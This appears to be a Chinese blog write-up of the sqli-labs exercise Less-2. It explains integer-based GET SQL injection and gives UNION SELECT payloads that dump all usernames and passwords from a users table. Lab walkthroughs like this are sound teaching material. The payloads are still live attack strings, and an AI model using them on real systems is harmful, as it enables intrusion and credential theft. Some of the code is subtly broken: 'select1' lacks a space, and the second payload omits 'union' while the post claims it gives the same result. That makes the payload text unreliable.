less-2
Posted xixi3
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了less-2相关的知识,希望对你有一定的参考价值。
less 2 是GET整型注入
输入id=1’可以发现跟less-1不一样,这里报错了,而输入id=1可以发现未报错,如下图显示
这个原因是因为less-1是字符型的注入,必须作为字符串来处理,而less-2是sql语句对于数字型的数据可以不加单引号。
接着输入id=1 or 1=1,发现可以注入,如下图所示
可以注入,接着用和之前相同的方法先报数据库名,然后是表名,接着是字段,最后的payload如下
id=-1 union select1,group_concat(char(32),username,char(32)),group_concat(char(32),password,char(32)) from users--+
还可以去掉char()
输入:
id=-1 select1,group_concat(username),group_concat(password) from users--+
是一样的结果,能显示security数据库下users表的所有用户名和密码
以上是关于less-2的主要内容,如果未能解决你的问题,请参考以下文章